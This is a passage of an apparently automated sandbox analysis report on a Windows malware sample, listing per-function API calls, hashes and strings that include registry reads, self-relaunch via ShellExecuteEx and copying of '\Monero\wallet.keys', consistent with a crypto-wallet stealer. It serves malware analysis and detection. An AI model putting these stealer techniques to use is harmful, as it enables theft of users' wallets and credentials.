                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                      • String ID:
                                      • API String ID: 3225020163-0
                                      • Opcode ID: 8750340f131db29ff05ba73a426176cc9528aab7b98ec55ca404cc140f47e7fe
                                      • Instruction ID: 29f49c572d9e0fb03b67c44665cd778e5edaa5b8942994ed82331821c1c82fa7
                                      • Opcode Fuzzy Hash: 8750340f131db29ff05ba73a426176cc9528aab7b98ec55ca404cc140f47e7fe
                                      • Instruction Fuzzy Hash: 40113DB1A44309BBDB14CB94DD49FABBBBCFB48B10F108159F606A7280D7B858009FA1
                                      Function 00539260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • StrStrA.SHLWAPI(00F1E1E8,?,?,?,0053140C,?,00F1E1E8,00000000), ref: 0053926C
                                      • lstrcpyn.KERNEL32(0076AB88,00F1E1E8,00F1E1E8,?,0053140C,?,00F1E1E8), ref: 00539290
                                      • lstrlen.KERNEL32(?,?,0053140C,?,00F1E1E8), ref: 005392A7
                                      • wsprintfA.USER32 ref: 005392C7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpynlstrlenwsprintf
                                      • String ID: %s%s
                                      • API String ID: 1206339513-3252725368
                                      • Opcode ID: 4f89332ec70f91840d2adef9f08b91141a13feb3e8fef4383651a57acc5f314f
                                      • Instruction ID: 9415adac959316528316ca7188b7f6ccba36e93e7b11e11a649af5f9cd03f993
                                      • Opcode Fuzzy Hash: 4f89332ec70f91840d2adef9f08b91141a13feb3e8fef4383651a57acc5f314f
                                      • Instruction Fuzzy Hash: 5401DEB5500208FFCB04DFECC984EAE7BB9FB44354F148558F90AAB244C675AA40DF95
                                      Function 005212A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 005212B4
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 005212BB
                                      • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 005212D7
                                      • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 005212F5
                                      • RegCloseKey.ADVAPI32(?), ref: 005212FF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                      • String ID:
                                      • API String ID: 3225020163-0
                                      • Opcode ID: 8a085748b40f0ee4be7178f5efad3e075f20b5845f79956b15b3693020231b98
                                      • Instruction ID: b37fc5b15d0e999e6f45ded1d051b30bdec200a72328f6500a39d46327f6e8b1
                                      • Opcode Fuzzy Hash: 8a085748b40f0ee4be7178f5efad3e075f20b5845f79956b15b3693020231b98
                                      • Instruction Fuzzy Hash: A701E6B9A40309BBDB14DFE4DC49FAEB7B8EB48701F108155FA06A7280D6B5AA018F55
                                      Function 0053C84E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: String___crt$Type
                                      • String ID:
                                      • API String ID: 2109742289-3916222277
                                      • Opcode ID: 0060a1afd0e852eae6d7b5916d150ee42afd7a97d430f2c5c2e9b706b2582a17
                                      • Instruction ID: 1f32334ff814eb0c4b94ae8e97374ebf72b3284763ec7298700e998f43d29e70
                                      • Opcode Fuzzy Hash: 0060a1afd0e852eae6d7b5916d150ee42afd7a97d430f2c5c2e9b706b2582a17
                                      • Instruction Fuzzy Hash: 8041C6B250075C5EDB218B248D85FFBBFF9BB45704F1448E8E98A96182D271AA44DF60
                                      Function 00536630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00536663
                                        • Part of subcall function 0053A740: lstrcpy.KERNEL32(00540E17,00000000), ref: 0053A788
                                        • Part of subcall function 0053A9B0: lstrlen.KERNEL32(?,00F199F0,?,\Monero\wallet.keys,00540E17), ref: 0053A9C5
                                        • Part of subcall function 0053A9B0: lstrcpy.KERNEL32(00000000), ref: 0053AA04
                                        • Part of subcall function 0053A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0053AA12
                                        • Part of subcall function 0053A8A0: lstrcpy.KERNEL32(?,00540E17), ref: 0053A905
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 00536726
                                      • ExitProcess.KERNEL32 ref: 00536755
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                      • String ID: <
                                      • API String ID: 1148417306-4251816714
                                      • Opcode ID: 5ac6609f9eb577b97e9871431edcd233640032efe043aa7419e59daed6e0a618
                                      • Instruction ID: 2232346fb0ba784c9f1fd22354aeca958608c1d9dd7010b79502bb82b35cd285
                                      • Opcode Fuzzy Hash: 5ac6609f9eb577b97e9871431edcd233640032efe043aa7419e59daed6e0a618
                                      • Instruction Fuzzy Hash: 1431FDB2801219ABDB14EB50DC95BDDBB78BF84300F404199F21676191DF746B49CF5A
                                      Function 005387C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00540E28,00000000,?), ref: 0053882F
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00538836
                                      • wsprintfA.USER32 ref: 00538850
                                        • Part of subcall function 0053A740: lstrcpy.KERNEL32(00540E17,00000000), ref: 0053A788
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateProcesslstrcpywsprintf
                                      • String ID: %dx%d
                                      • API String ID: 1695172769-2206825331
                                      • Opcode ID: 35e2df741408b1b9c08ffcddffd7a15bd6b82e5cc57fed77700b22d7d64d72df
                                      • Instruction ID: ea5c4a739bf11966088240ef6c1fa1e570c635b48be208971d3ae7b63ebb0740
                                      • Opcode Fuzzy Hash: 35e2df741408b1b9c08ffcddffd7a15bd6b82e5cc57fed77700b22d7d64d72df
                                      • Instruction Fuzzy Hash: F821EDB1A44305BBDB04DF94DD49FAEBBB8FB48711F108519F606B7280C7B9A9018FA5
                                      Function 00538D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0053951E,00000000), ref: 00538D5B
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00538D62
                                      • wsprintfW.USER32 ref: 00538D78
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateProcesswsprintf
                                      • String ID: %hs
                                      • API String ID: 769748085-2783943728
                                      • Opcode ID: 749d64902cc15b33d1cce9999030c3d147ffe29928d74553caba88a92c661e6c
                                      • Instruction ID: 832361584e0c7a2d6d5567a747f8b68eaa714a4e0068015f5602cf813d25d1d2
                                      • Opcode Fuzzy Hash: 749d64902cc15b33d1cce9999030c3d147ffe29928d74553caba88a92c661e6c
                                      • Instruction Fuzzy Hash: ACE0E675A50309BFD710DB94DD09E5977B8EB44702F104154FD0B97280D9B56E109F56
                                      Function 0052A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0053A740: lstrcpy.KERNEL32(00540E17,00000000), ref: 0053A788
                                        • Part of subcall function 0053A9B0: lstrlen.KERNEL32(?,00F199F0,?,\Monero\wallet.keys,00540E17), ref: 0053A9C5
                                        • Part of subcall function 0053A9B0: lstrcpy.KERNEL32(00000000), ref: 0053AA04
                                        • Part of subcall function 0053A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0053AA12
                                        • Part of subcall function 0053A8A0: lstrcpy.KERNEL32(?,00540E17), ref: 0053A905
                                        • Part of subcall function 00538B60: GetSystemTime.KERNEL32(00540E1A,00F0FB78,005405AE,?,?,005213F9,?,0000001A,00540E1A,00000000,?,00F199F0,?,\Monero\wallet.keys,00540E17), ref: 00538B86
                                        • Part of subcall function 0053A920: lstrcpy.KERNEL32(00000000,?), ref: 0053A972
                                        • Part of subcall function 0053A920: lstrcat.KERNEL32(00000000), ref: 0053A982
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0052A2E1
                                      • lstrlen.KERNEL32(00000000,00000000), ref: 0052A3FF
                                      • lstrlen.KERNEL32(00000000), ref: 0052A6BC
                                        • Part of subcall function 0053A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0053A7E6
                                      • DeleteFileA.KERNEL32(00000000), ref: 0052A743
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                      • String ID:
                                      • API String ID: 211194620-0
                                      • Opcode ID: 3da80faac736683652a2c921a943901f5aed19e822284d4ad6041d9174c43075
                                      • Instruction ID: 2a2c7ed48ca7be4a5bf64e3afb99d544986e47e5040487ad9dee3f3cd2ce2edc
                                      • Opcode Fuzzy Hash: 3da80faac736683652a2c921a943901f5aed19e822284d4ad6041d9174c43075
                                      • Instruction Fuzzy Hash: 79E11073810109ABCB04FBA4DC9AEEEBB38BF94300F508159F55772091EF746A49CB66
                                      Function 0052D400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0053A740: lstrcpy.KERNEL32(00540E17,00000000), ref: 0053A788
                                        • Part of subcall function 0053A9B0: lstrlen.KERNEL32(?,00F199F0,?,\Monero\wallet.keys,00540E17), ref: 0053A9C5
                                        • Part of subcall function 0053A9B0: lstrcpy.KERNEL32(00000000), ref: 0053AA04
                                        • Part of subcall function 0053A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0053AA12
                                        • Part of subcall function 0053A8A0: lstrcpy.KERNEL32(?,00540E17), ref: 0053A905
                                        • Part of subcall function 00538B60: GetSystemTime.KERNEL32(00540E1A,00F0FB78,005405AE,?,?,005213F9,?,0000001A,00540E1A,00000000,?,00F199F0,?,\Monero\wallet.keys,00540E17), ref: 00538B86
                                        • Part of subcall function 0053A920: lstrcpy.KERNEL32(00000000,?), ref: 0053A972
                                        • Part of subcall function 0053A920: lstrcat.KERNEL32(00000000), ref: 0053A982
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0052D481
                                      • lstrlen.KERNEL32(00000000), ref: 0052D698
                                      • lstrlen.KERNEL32(00000000), ref: 0052D6AC
                                      • DeleteFileA.KERNEL32(00000000), ref: 0052D72B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                      • String ID:
                                      • API String ID: 211194620-0
                                      • Opcode ID: 10bb7bbf9d20b51fef1e46687481ae3711cafecbadb6f0e289853d65d4edac1f
                                      • Instruction ID: 92a903172e5f9679b4f2c90f92087315fd71df2ac342f93e87137edf1597d636
                                      • Opcode Fuzzy Hash: 10bb7bbf9d20b51fef1e46687481ae3711cafecbadb6f0e289853d65d4edac1f
                                      • Instruction Fuzzy Hash: 1D910672910109ABDB04FBA4DC9AEEEBB38BF94300F508158F54776091EF746A09CB66
                                      Function 0052D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0053A740: lstrcpy.KERNEL32(00540E17,00000000), ref: 0053A788
                                        • Part of subcall function 0053A9B0: lstrlen.KERNEL32(?,00F199F0,?,\Monero\wallet.keys,00540E17), ref: 0053A9C5
                                        • Part of subcall function 0053A9B0: lstrcpy.KERNEL32(00000000), ref: 0053AA04
                                        • Part of subcall function 0053A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0053AA12
                                        • Part of subcall function 0053A8A0: lstrcpy.KERNEL32(?,00540E17), ref: 0053A905
                                        • Part of subcall function 00538B60: GetSystemTime.KERNEL32(00540E1A,00F0FB78,005405AE,?,?,005213F9,?,0000001A,00540E1A,00000000,?,00F199F0,?,\Monero\wallet.keys,00540E17), ref: 00538B86
                                        • Part of subcall function 0053A920: lstrcpy.KERNEL32(00000000,?), ref: 0053A972
                                        • Part of subcall function 0053A920: lstrcat.KERNEL32(00000000), ref: 0053A982
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0052D801
                                      • lstrlen.KERNEL32(00000000), ref: 0052D99F
                                      • lstrlen.KERNEL32(00000000), ref: 0052D9B3
                                      • DeleteFileA.KERNEL32(00000000), ref: 0052DA32
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                      • String ID:
                                      • API String ID: 211194620-0
                                      • Opcode ID: 5d01b2b37cd7077f21c66b80a8fb0fa4e5cdd11bd36c75342d1df271db9d8a04
                                      • Instruction ID: da24577d60c4b4d9c0e4b8e6f86859b98a421e68996c3f4ea0ffc25bbc25e7ba
